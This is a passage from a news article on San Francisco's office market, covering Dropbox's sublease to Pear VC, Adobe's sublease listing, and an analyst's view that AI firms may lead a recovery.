There’s no shortage of options right now. San Francisco’s commercial buildings are currently 35% vacant, and more tenants are still flowing out the door than coming in.
Dropbox originally leased the entire 750,000-square-foot building it currently occupies, but it never filled the space entirely, and after COVID struck, it began more aggressively whittling down its use. It paid $32 million in late 2021 to terminate part of its 15-year lease; before newly subleasing space to Pear VC, it separately subleased roughly 200,000 square feet to two life sciences companies, Vir Biotechnology and BridgeBio. The building is still less than half full.
This week, Adobe listed half its leased footprint in San Francisco’s Showplace Square neighborhood and is now looking to sublease 156,000 square feet across three floors of one of the buildings it used to occupy.
But a tipping point is seemingly in sight. There was “negative net absorption” of 1.85 million square feet in San Francisco in the third quarter of this year, according to CBRE data, meaning more space was vacated than newly leased; at the same time, market demand reached 5.2 million square feet, its highest level since the first quarter of 2020.
Much of that shift can be traced to companies like OpenAI, suggests Yasukochi, who says a new spate of outfits is starting to set up shop, enticed by the opportunity to rent sleeker space in more central parts of the city for the same or better prices than less finished locations commanded several years ago. “It’s a huge opportunity for companies that are trying to bring back their employees,” says Yasukochi. (OpenAI CEO Sam Altman has long said he thinks companies are more effective when employees convene in person.)
Indeed, Yasukochi anticipates that if the economy improves in the second half of the new year and interest rates come down, tech outfits in particular will be positioned to recover faster — and pull the city along with them. “Many tech companies were quick to cut excess employees, along with real estate and other costs,” says Yasukochi. He also says that while tech outfits are typically “early to cut back, they’re also early to grow. I don’t see any other industry that generates the volume of growth that tech can.”
Worth noting: Yasukochi does not think those tech companies will necessarily be growing in San Francisco’s Hayes Valley. Though the small shop-studded neighborhood has led a resurgence of interest in San Francisco this year and eagerly embraced the moniker “Cerebral Valley,” owing to its concentration of AI communities, most of those teams, he observes, are “meeting in restaurants and bars and working out of their apartments.”
The reality, Yasukochi continues, is “there isn’t a lot of office space there.”
Pictured above: 1800 Owens Street in San Francisco, which is the site of Dropbox’s headquarters and now, Pear VC’s San Francisco office, too.